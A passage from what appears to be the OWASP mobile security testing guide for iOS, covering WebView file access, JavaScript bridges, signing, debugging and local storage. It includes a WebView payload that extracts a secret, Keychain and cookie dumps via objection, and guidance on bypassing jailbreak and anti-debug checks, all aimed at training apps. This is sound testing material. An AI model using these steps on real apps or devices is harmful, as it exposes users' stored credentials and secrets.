file://
scheme is also always enabled and it cannot be disabled.file://
URLs by default but it can be enabled.The following WebView properties can be used to configure file access:
allowFileAccessFromFileURLs
(WKPreferences
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from other file://
scheme URLs.allowUniversalAccessFromFileURLs
(WKWebViewConfiguration
, false
by default): it enables JavaScript running in the context of a file://
scheme URL to access content from any origin.For example, it is possible to set the undocumented property allowFileAccessFromFileURLs
by doing this:
Objective-C:
[webView.configuration.preferences setValue:@YES forKey:@\"allowFileAccessFromFileURLs\"];\n
Swift:
webView.configuration.preferences.setValue(true, forKey: \"allowFileAccessFromFileURLs\")\n
If one or more of the above properties are activated, you should determine whether they are really necessary for the app to work properly.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#checking-telephone-number-detection","title":"Checking Telephone Number Detection","text":"In Safari on iOS, telephone number detection is on by default. However, you might want to turn it off if your HTML page contains numbers that can be interpreted as phone numbers, but are not phone numbers, or to prevent the DOM document from being modified when parsed by the browser. To turn off telephone number detection in Safari on iOS, use the format-detection meta tag (<meta name = \"format-detection\" content = \"telephone=no\">
). An example of this can be found in the Apple developer documentation. Phone links should be then used (e.g. <a href=\"tel:1-408-555-5555\">1-408-555-5555</a>
) to explicitly create a link.
If it's possible to load local files via a WebView, the app might be vulnerable to directory traversal attacks. This would allow access to all files within the sandbox or even to escape the sandbox with full access to the file system (if the device is jailbroken). It should therefore be verified if a user can change the filename or path from which the file is loaded, and they shouldn't be able to edit the loaded file.
To simulate an attack, you may inject your own JavaScript into the WebView with an interception proxy or simply by using dynamic instrumentation. Attempt to access local storage and any native methods and properties that might be exposed to the JavaScript context.
In a real-world scenario, JavaScript can only be injected through a permanent backend Cross-Site Scripting vulnerability or a MITM attack. See the OWASP XSS Prevention Cheat Sheet and the chapter \"iOS Network Communication\" for more information.
For what concerns this section we will learn about:
As we have seen above in \"Testing How WebViews are Loaded\", if \"scenario 2\" of the WKWebViews is loaded, the app will do so by calling URLForResource:withExtension:
and loadHTMLString:baseURL
.
To quickly inspect this, you can use frida-trace and trace all \"loadHTMLString\" and \"URLForResource:withExtension:\" methods.
$ frida-trace -U \"Where's My Browser?\"\n -m \"*[WKWebView *loadHTMLString*]\" -m \"*[* URLForResource:withExtension:]\"\n\n 14131 ms -[NSBundle URLForResource:0x1c0255390 withExtension:0x0]\n 14131 ms URLForResource: web/WKWebView/scenario2.html\n 14131 ms withExtension: 0x0\n 14190 ms -[WKWebView loadHTMLString:0x1c0255390 baseURL:0x0]\n 14190 ms HTMLString: <!DOCTYPE html>\n <html>\n ...\n </html>\n\n 14190 ms baseURL: nil\n
In this case, baseURL
is set to nil
, meaning that the effective origin is \"null\". You can obtain the effective origin by running window.origin
from the JavaScript of the page (this app has an exploitation helper that allows to write and run JavaScript, but you could also implement a MITM or simply use Frida to inject JavaScript, e.g. via evaluateJavaScript:completionHandler
of WKWebView
).
As an additional note regarding UIWebView
s, if you retrieve the effective origin from a UIWebView
where baseURL
is also set to nil
you will see that it is not set to \"null\", instead you'll obtain something similar to the following:
applewebdata://5361016c-f4a0-4305-816b-65411fc1d780\n
This origin \"applewebdata://\" is similar to the \"file://\" origin as it does not implement Same-Origin Policy and allow access to local files and any web resources. In this case, it would be better to set baseURL
to \"about:blank\", this way, the Same-Origin Policy would prevent cross-origin access. However, the recommendation here is to completely avoid using UIWebView
s and go for WKWebView
s instead.
Even if not having the original source code, you can quickly determine if the app's WebViews do allow file access and which kind. For this, simply navigate to the target WebView in the app and inspect all its instances, for each of them get the values mentioned in the static analysis, that is, allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
. This only applies to WKWebView
s (UIWebVIew
s always allow file access).
We continue with our example using the \"Where's My Browser?\" app and Frida REPL, extend the script with the following content:
ObjC.choose(ObjC.classes['WKWebView'], {\n onMatch: function (wk) {\n console.log('onMatch: ', wk);\n console.log('URL: ', wk.URL().toString());\n console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled());\n console.log('allowFileAccessFromFileURLs: ',\n wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString());\n console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString());\n console.log('allowUniversalAccessFromFileURLs: ',\n wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString());\n },\n onComplete: function () {\n console.log('done for WKWebView!');\n }\n});\n
If you run it now, you'll have all the information you need:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n\nonMatch: <WKWebView: 0x1508b1200; frame = (0 0; 320 393); layer = <CALayer: 0x1c4238f20>>\nURL: file:///var/mobile/Containers/Data/Application/A654D169-1DB7-429C-9DB9-A871389A8BAA/\n Library/WKWebView/scenario1.html\njavaScriptEnabled: true\nallowFileAccessFromFileURLs: 0\nhasOnlySecureContent: false\nallowUniversalAccessFromFileURLs: 0\n
Both allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
are set to \"0\", meaning that they are disabled. In this app we can go to the WebView configuration and enable allowFileAccessFromFileURLs
. If we do so and re-run the script we will see how it is set to \"1\" this time:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n...\n\nallowFileAccessFromFileURLs: 1\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/","title":"Determining Whether Native Methods Are Exposed Through WebViews","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-uiwebview-javascript-to-native-bridges","title":"Testing UIWebView JavaScript to Native Bridges","text":"Search for code that maps native objects to the JSContext
associated with a WebView and analyze what functionality it exposes, for example no sensitive data should be accessible and exposed to WebViews.
In Objective-C, the JSContext
associated with a UIWebView
is obtained as follows:
[webView valueForKeyPath:@\"documentView.webView.mainFrame.javaScriptContext\"]\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-wkwebview-javascript-to-native-bridges","title":"Testing WKWebView JavaScript to Native Bridges","text":"Verify if a JavaScript to native bridge exists by searching for WKScriptMessageHandler
and check all exposed methods. Then verify how the methods are called.
The following example from \"Where's My Browser?\" demonstrates this.
First we see how the JavaScript bridge is enabled:
func enableJavaScriptBridge(_ enabled: Bool) {\n options_dict[\"javaScriptBridge\"]?.value = enabled\n let userContentController = wkWebViewConfiguration.userContentController\n userContentController.removeScriptMessageHandler(forName: \"javaScriptBridge\")\n\n if enabled {\n let javaScriptBridgeMessageHandler = JavaScriptBridgeMessageHandler()\n userContentController.add(javaScriptBridgeMessageHandler, name: \"javaScriptBridge\")\n }\n}\n
Adding a script message handler with name \"name\"
(or \"javaScriptBridge\"
in the example above) causes the JavaScript function window.webkit.messageHandlers.myJavaScriptMessageHandler.postMessage
to be defined in all frames in all web views that use the user content controller. It can be then used from the HTML file like this:
function invokeNativeOperation() {\n value1 = document.getElementById(\"value1\").value\n value2 = document.getElementById(\"value2\").value\n window.webkit.messageHandlers.javaScriptBridge.postMessage([\"multiplyNumbers\", value1, value2]);\n}\n
The called function resides in JavaScriptBridgeMessageHandler.swift
:
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {\n\n//...\n\ncase \"multiplyNumbers\":\n\n let arg1 = Double(messageArray[1])!\n let arg2 = Double(messageArray[2])!\n result = String(arg1 * arg2)\n//...\n\nlet javaScriptCallBack = \"javascriptBridgeCallBack('\\(functionFromJS)','\\(result)')\"\nmessage.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)\n
The problem here is that the JavaScriptBridgeMessageHandler
not only contains that function, it also exposes a sensitive function:
case \"getSecret\":\n result = \"XSRSOGKC342\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#dynamic-analysis","title":"Dynamic Analysis","text":"At this point you've surely identified all potentially interesting WebViews in the iOS app and got an overview of the potential attack surface (via static analysis, the dynamic analysis techniques that we have seen in previous sections or a combination of them). This would include HTML and JavaScript files, usage of the JSContext
/ JSExport
for UIWebView
and WKScriptMessageHandler
for WKWebView
, as well as which functions are exposed and present in a WebView.
Further dynamic analysis can help you exploit those functions and get sensitive data that they might be exposing. As we have seen in the static analysis, in the previous example it was trivial to get the secret value by performing reverse engineering (the secret value was found in plain text inside the source code) but imagine that the exposed function retrieves the secret from secure storage. In this case, only dynamic analysis and exploitation would help.
The procedure for exploiting the functions starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via various techniques, for example:
stringByEvaluatingJavaScriptFromString:
for UIWebView
and evaluateJavaScript:completionHandler:
for WKWebView
).In order to get the secret from the previous example of the \"Where's My Browser?\" app, you can use one of these techniques to inject the following payload that will reveal the secret by writing it to the \"result\" field of the WebView:
function javascriptBridgeCallBack(name, value) {\n document.getElementById(\"result\").innerHTML=value;\n};\nwindow.webkit.messageHandlers.javaScriptBridge.postMessage([\"getSecret\"]);\n
Of course, you may also use the Exploitation Helper it provides:
See another example for a vulnerable iOS app and function that is exposed to a WebView in [#thiel2] page 156.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/","title":"Making Sure that the App Is Properly Signed","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#static-analysis","title":"Static Analysis","text":"You have to ensure that the app is using the latest code signature format. You can retrieve the signing certificate information from the application's .app file with codesign. Codesign is used to create, check, and display code signatures, as well as inquire into the dynamic status of signed code in the system.
After you get the application's IPA file, re-save it as a ZIP file and decompress the ZIP file. Navigate to the Payload directory, where the application's .app file will be.
Execute the following codesign
command to display the signing information:
$ codesign -dvvv YOURAPP.app\nExecutable=/Users/Documents/YOURAPP/Payload/YOURAPP.app/YOURNAME\nIdentifier=com.example.example\nFormat=app bundle with Mach-O universal (armv7 arm64)\nCodeDirectory v=20200 size=154808 flags=0x0(none) hashes=4830+5 location=embedded\nHash type=sha256 size=32\nCandidateCDHash sha1=455758418a5f6a878bb8fdb709ccfca52c0b5b9e\nCandidateCDHash sha256=fd44efd7d03fb03563b90037f92b6ffff3270c46\nHash choices=sha1,sha256\nCDHash=fd44efd7d03fb03563b90037f92b6ffff3270c46\nSignature size=4678\nAuthority=iPhone Distribution: Example Ltd\nAuthority=Apple Worldwide Developer Relations Certification Authority\nAuthority=Apple Root CA\nSigned Time=4 Aug 2017, 12:42:52\nInfo.plist entries=66\nTeamIdentifier=8LAMR92KJ8\nSealed Resources version=2 rules=12 files=1410\nInternal requirements count=1 size=176\n
There are various ways to distribute your app as described at the Apple documentation, which include using the App Store or via Apple Business Manager for custom or in-house distribution. In case of an in-house distribution scheme, make sure that no ad hoc certificates are used when the app is signed for distribution.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/","title":"Testing whether the App is Debuggable","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#static-analysis","title":"Static Analysis","text":"Inspect the app entitlements and check the value of get-task-allow
key. If it is set to true
, the app is debuggable.
Using codesign:
$ codesign -d --entitlements - iGoat-Swift.app\n\nExecutable=/Users/owasp/iGoat-Swift/Payload/iGoat-Swift.app/iGoat-Swift\n[Dict]\n [Key] application-identifier\n [Value]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n [Key] com.apple.developer.team-identifier\n [Value]\n [String] TNAJ496RHB\n [Key] get-task-allow\n [Value]\n [Bool] true\n [Key] keychain-access-groups\n [Value]\n [Array]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n````\n\nUsing ldid:\n\n```xml\n$ ldid -e iGoat-Swift.app/iGoat-Swift\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n <key>com.apple.developer.team-identifier</key>\n <string>TNAJ496RHB</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n </array>\n</dict>\n</plist>\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#dynamic-analysis","title":"Dynamic Analysis","text":"Check whether you can attach a debugger directly, using Xcode. Next, check if you can debug the app on a jailbroken device after Clutching it. This is done using the debug-server which comes from the BigBoss repository at Cydia.
Note: if the application is equipped with anti-reverse engineering controls, then the debugger can be detected and stopped.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/","title":"Testing for Debugging Symbols","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#static-analysis","title":"Static Analysis","text":"To verify the existence of debug symbols you can use objdump from binutils or llvm-objdump to inspect all of the app binaries.
In the following snippet we run objdump over TargetApp
(the iOS main app executable) to show the typical output of a binary containing debug symbols which are marked with the d
(debug) flag. Check the objdump man page for information about various other symbol flag characters.
$ objdump --syms TargetApp\n\n0000000100007dc8 l d *UND* -[ViewController handleSubmitButton:]\n000000010000809c l d *UND* -[ViewController touchesBegan:withEvent:]\n0000000100008158 l d *UND* -[ViewController viewDidLoad]\n...\n000000010000916c l d *UND* _disable_gdb\n00000001000091d8 l d *UND* _detect_injected_dylds\n00000001000092a4 l d *UND* _isDebugged\n...\n
To prevent the inclusion of debug symbols, set Strip Debug Symbols During Copy
to YES
via the XCode project's build settings. Stripping debugging symbols will not only reduce the size of the binary but also increase the difficulty of reverse engineering.
Dynamic analysis is not applicable for finding debugging symbols.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/","title":"Testing for Debugging Code and Verbose Error Logging","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#static-analysis","title":"Static Analysis","text":"You can take the following static analysis approach for the logging statements:
NSLog
, println
, print
, dump
, debugPrint
.#ifdef DEBUG\n // Debug-only code\n#endif\n
The procedure for enabling this behavior in Swift has changed: you need to either set environment variables in your scheme or set them as custom flags in the target's build settings. Please note that the following functions (which allow you to determine whether the app was built in the Swift 2.1. release-configuration) aren't recommended, as Xcode 8 and Swift 3 don't support these functions:
_isDebugAssertConfiguration
_isReleaseAssertConfiguration
_isFastAssertConfiguration
.Depending on the application's setup, there may be more logging functions. For example, when CocoaLumberjack is used, static analysis is a bit different.
For the \"debug-management\" code (which is built-in): inspect the storyboards to see whether there are any flows and/or view-controllers that provide functionality different from the functionality the application should support. This functionality can be anything from debug views to printed error messages, from custom stub-response configurations to logs written to files on the application's file system or a remote server.
As a developer, incorporating debug statements into your application's debug version should not be a problem as long as you make sure that the debug statements are never present in the application's release version.
In Objective-C, developers can use preprocessor macros to filter out debug code:
#ifdef DEBUG\n // Debug-only code\n#endif\n
In Swift 2 (with Xcode 7), you have to set custom compiler flags for every target, and compiler flags have to start with \"-D\". So you can use the following annotations when the debug flag DMSTG-DEBUG
is set:
#if MSTG-DEBUG\n // Debug-only code\n#endif\n
In Swift 3 (with Xcode 8), you can set Active Compilation Conditions in Build settings/Swift compiler - Custom flags. Instead of a preprocessor, Swift 3 uses conditional compilation blocks based on the defined conditions:
#if DEBUG_LOGGING\n // Debug-only code\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic analysis should be executed on both a simulator and a device because developers sometimes use target-based functions (instead of functions based on a release/debug-mode) to execute the debugging code.
For the other \"manager-based\" debug code: click through the application on both a simulator and a device to see if you can find any functionality that allows an app's profiles to be pre-set, allows the actual server to be selected or allows responses from the API to be selected.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/","title":"Testing Jailbreak Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/#overview","title":"Overview","text":"To test for jailbreak detection install the app on a jailbroken device.
Launch the app and see what happens:
If it implements jailbreak detection, you might notice one of the following things:
Note that crashes might be an indicator of jailbreak detection but the app may be crashing for any other reasons, e.g. it may have a bug. We recommend to test the app on non-jailbroken device first, especially when you're testing preproduction versions.
Launch the app and try to bypass Jailbreak Detection using an automated tool:
If it implements jailbreak detection, you might be able to see indicators of that in the output of the tool. See section \"Automated Jailbreak Detection Bypass\".
Reverse Engineer the app:
The app might be using techniques that are not implemented in the automated tools that you've used. If that's the case you must reverse engineer the app to find proofs. See section \"Manual Jailbreak Detection Bypass\".
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/","title":"Testing Anti-Debugging Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/#overview","title":"Overview","text":"In order to test for anti-debugging detection you can try to attach a debugger to the app and see what happens.
The app should respond in some way. For example by:
Try to hook or reverse engineer the app using the methods from section \"Anti-Debugging Detection\".
Next, work on bypassing the detection and answer the following questions:
Application Source Code Integrity Checks:
Run the app on the device in an unmodified state and make sure that everything works. Then apply patches to the executable using optool, re-sign the app as described in the chapter \"iOS Tampering and Reverse Engineering\", and run it.
The app should respond in some way. For example by:
Work on bypassing the defenses and answer the following questions:
File Storage Integrity Checks:
Go to the app data directories as indicated in section \"Accessing App Data Directories\" and modify some files.
Next, work on bypassing the defenses and answer the following questions:
Launch the app with various reverse engineering tools and frameworks installed on your test device, such as Frida, Cydia Substrate, Cycript or SSL Kill Switch.
The app should respond in some way to the presence of those tools. For example by:
Next, work on bypassing the detection of the reverse engineering tools and answer the following questions:
In order to test for emulator detection you can try to run the app on different emulators as indicated in section \"Emulator Detection\" and see what happens.
The app should respond in some way. For example by:
You can also reverse engineer the app using ideas for strings and methods from section \"Emulator Detection\".
Next, work on bypassing this detection and answer the following questions:
Attempt to disassemble the Mach-O in the IPA and any included library files in the \"Frameworks\" directory (.dylib or .framework files), and perform static analysis. At the very least, the app's core functionality (i.e., the functionality meant to be obfuscated) shouldn't be easily discerned. Verify that:
For a more detailed assessment, you need a detailed understanding of the relevant threats and the obfuscation methods used.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/","title":"Testing Local Data Storage","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#overview","title":"Overview","text":"This test case focuses on identifying potentially sensitive data stored by an application and verifying if it is securely stored. The following checks should be performed:
NSUserDefaults
, databases, KeyChain, Internal Storage, External Storage, etc.NOTE: For MASVS L1 compliance, it is sufficient to store data unencrypted in the application's internal storage directory (sandbox). For L2 compliance, additional encryption is required using cryptographic keys securely managed in the iOS KeyChain. This includes using envelope encryption (DEK+KEK) or equivalent methods.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#static-analysis","title":"Static Analysis","text":"When you have access to the source code of an iOS app, identify sensitive data that's saved and processed throughout the app. This includes passwords, secret keys, and personally identifiable information (PII), but it may as well include other data identified as sensitive by industry regulations, laws, and company policies. Look for this data being saved via any of the local storage APIs listed below.
Make sure that sensitive data is never stored without appropriate protection. For example, authentication tokens should not be saved in NSUserDefaults
without additional encryption. Also avoid storing encryption keys in .plist
files, hardcoded as strings in code, or generated using a predictable obfuscation function or key derivation function based on stable attributes.
Sensitive data should be stored by using the Keychain API (that stores them inside the Secure Enclave), or stored encrypted using envelope encryption. Envelope encryption, or key wrapping, is a cryptographic construct that uses symmetric encryption to encapsulate key material. Data encryption keys (DEK) can be encrypted with key encryption keys (KEK) which must be securely stored in the Keychain. Encrypted DEK can be stored in NSUserDefaults
or written in files. When required, application reads KEK, then decrypts DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
The encryption must be implemented so that the secret key is stored in the Keychain with secure settings, ideally kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
. This ensures the usage of hardware-backed storage mechanisms. Make sure that the AccessControlFlags
are set according to the security policy of the keys in the KeyChain.
Generic examples of using the KeyChain to store, update, and delete data can be found in the official Apple documentation. The official Apple documentation also includes an example of using Touch ID and passcode protected keys.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#filesystem","title":"Filesystem","text":"Using the source code, examine the different APIs used to store data locally. Make sure that any data is properly encrypted based on its sensitivity.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis","title":"Dynamic Analysis","text":"One way to determine whether sensitive information (like credentials and keys) is stored insecurely without leveraging native iOS functions is to analyze the app's data directory. Triggering all app functionality before the data is analyzed is important because the app may store sensitive data only after specific functionality has been triggered. You can then perform static analysis for the data dump according to generic keywords and app-specific data.
The following steps can be used to determine how the application stores data locally on a jailbroken iOS device:
/var/mobile/Containers/Data/Application/$APP_ID/
grep -iRn \"USERID\"
.You can analyze the app's data directory on a non-jailbroken iOS device by using third-party applications, such as iMazing.
$APP_NAME.imazing
. Rename it to $APP_NAME.zip
.Note that tools like iMazing don't copy data directly from the device. They try to extract data from the backups they create. Therefore, getting all the app data that's stored on the iOS device is impossible: not all folders are included in backups. Use a jailbroken device or repackage the app with Frida and use a tool like objection to access all the data and files.
If you added the Frida library to the app and repackaged it as described in \"Dynamic Analysis on Non-Jailbroken Devices\" (from the \"Tampering and Reverse Engineering on iOS\" chapter), you can use objection to transfer files directly from the app's data directory or read files in objection as explained in the chapter \"Basic Security Testing on iOS\", section \"Host-Device Data Transfer\".
The Keychain contents can be dumped during dynamic analysis. On a jailbroken device, you can use Keychain dumper as described in the chapter \"Basic Security Testing on iOS\".
The path to the Keychain file is
/private/var/Keychains/keychain-2.db\n
On a non-jailbroken device, you can use objection to dump the Keychain items created and stored by the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-xcode-and-ios-simulator","title":"Dynamic Analysis with Xcode and iOS simulator","text":"This test is only available on macOS, as Xcode and the iOS simulator is needed.
For testing the local storage and verifying what data is stored within it, it's not mandatory to have an iOS device. With access to the source code and Xcode the app can be build and deployed in the iOS simulator. The file system of the current device of the iOS simulator is available in ~/Library/Developer/CoreSimulator/Devices
.
Once the app is running in the iOS simulator, you can navigate to the directory of the latest simulator started with the following command:
$ cd ~/Library/Developer/CoreSimulator/Devices/$(\nls -alht ~/Library/Developer/CoreSimulator/Devices | head -n 2 |\nawk '{print $9}' | sed -n '1!p')/data/Containers/Data/Application\n
The command above will automatically find the UUID of the latest simulator started. Now you still need to grep for your app name or a keyword in your app. This will show you the UUID of the app.
grep -iRn keyword .\n
Then you can monitor and verify the changes in the filesystem of the app and investigate if any sensitive information is stored within the files while using the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-objection","title":"Dynamic Analysis with Objection","text":"You can use the objection runtime mobile exploration toolkit to find vulnerabilities caused by the application's data storage mechanism. Objection can be used without a Jailbroken device, but it will require patching the iOS Application.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#reading-the-keychain","title":"Reading the Keychain","text":"To use Objection to read the Keychain, execute the following command:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-binary-cookies","title":"Searching for Binary Cookies","text":"iOS applications often store binary cookie files in the application sandbox. Cookies are binary files containing cookie data for application WebViews. You can use objection to convert these files to a JSON format and inspect the data.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json\n[\n {\n \"domain\": \"highaltitudehacks.com\",\n \"expiresDate\": \"2051-09-15 07:46:43 +0000\",\n \"isHTTPOnly\": \"false\",\n \"isSecure\": \"false\",\n \"name\": \"username\",\n \"path\": \"/\",\n \"value\": \"admin123\",\n \"version\": \"0\"\n }\n]\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-property-list-files","title":"Searching for Property List Files","text":"iOS applications often store data in property list (plist) files that are stored in both the application sandbox and the IPA package. Sometimes these files contain sensitive information, such as usernames and passwords; therefore, the contents of these files should be inspected during iOS assessments. Use the ios plist cat plistFileName.plist
command to inspect the plist file.
To find the file userInfo.plist, use the env
command. It will print out the locations of the applications Library, Caches and Documents directories:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # env\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /private/var/containers/Bundle/Application/B2C8E457-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCachesDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library\n
Go to the Documents directory and list all files using ls
.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Owner Group Size Creation Name\n------------ ------- ------------------------------------ ------ ------- ------------ ------------ -------- ------------------------- ------------------------\nDirectory 493 n/a True True mobile (501) mobile (501) 192.0 B 2020-02-12 07:03:51 +0000 default.realm.management\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 16.0 KiB 2020-02-12 07:03:51 +0000 default.realm\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 1.2 KiB 2020-02-12 07:03:51 +0000 default.realm.lock\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 284.0 B 2020-05-29 18:15:23 +0000 userInfo.plist\nUnknown 384 n/a True True mobile (501) mobile (501) 0.0 B 2020-02-12 07:03:51 +0000 default.realm.note\n\nReadable: True Writable: True\n
Execute the ios plist cat
command to inspect the content of userInfo.plist file.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios plist cat userInfo.plist\n{\n password = password123;\n username = userName;\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-sqlite-databases","title":"Searching for SQLite Databases","text":"iOS applications typically use SQLite databases to store data required by the application. Testers should check the data protection values of these files and their contents for sensitive data. Objection contains a module to interact with SQLite databases. It allows to dump the schema, their tables and query the records.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # sqlite connect Model.sqlite\nCaching local copy of database file...\nDownloading /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nValidating SQLite database format\nConnected to SQLite database at: Model.sqlite\n\nSQLite @ Model.sqlite > .tables\n+--------------+\n| name |\n+--------------+\n| ZUSER |\n| Z_METADATA |\n| Z_MODELCACHE |\n| Z_PRIMARYKEY |\n+--------------+\nTime: 0.013s\n\nSQLite @ Model.sqlite > select * from Z_PRIMARYKEY\n+-------+--------+---------+-------+\n| Z_ENT | Z_NAME | Z_SUPER | Z_MAX |\n+-------+--------+---------+-------+\n| 1 | User | 0 | 0 |\n+-------+--------+---------+-------+\n1 row in set\nTime: 0.013s\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-cache-databases","title":"Searching for Cache Databases","text":"By default NSURLSession stores data, such as HTTP requests and responses in the Cache.db database. This database can contain sensitive data, if tokens, usernames or any other sensitive information has been cached. To find the cached information open the data directory of the app (/var/mobile/Containers/Data/Application/<UUID>
) and go to /Library/Caches/<Bundle Identifier>
. The WebKit cache is also being stored in the Cache.db file. Objection can open and interact with the database with the command sqlite connect Cache.db
, as it is a normal SQLite database.
It is recommended to disable Caching this data, as it may contain sensitive information in the request or response. The following list below shows different ways of achieving this:
removeAllCachedResponses
You can call this method as follows:URLCache.shared.removeAllCachedResponses()
This method will remove all cached requests and responses from Cache.db file.
Apple documentation:
An ephemeral session configuration object is similar to a default session configuration (see default), except that the corresponding session object doesn\u2019t store caches, credential stores, or any session-related data to disk. Instead, session-related data is stored in RAM. The only time an ephemeral session writes data to disk is when you tell it to write the contents of a URL to a file.
Use the following keywords to check the app's source code for predefined and custom logging statements:
A generalized approach to this issue is to use a define to enable NSLog
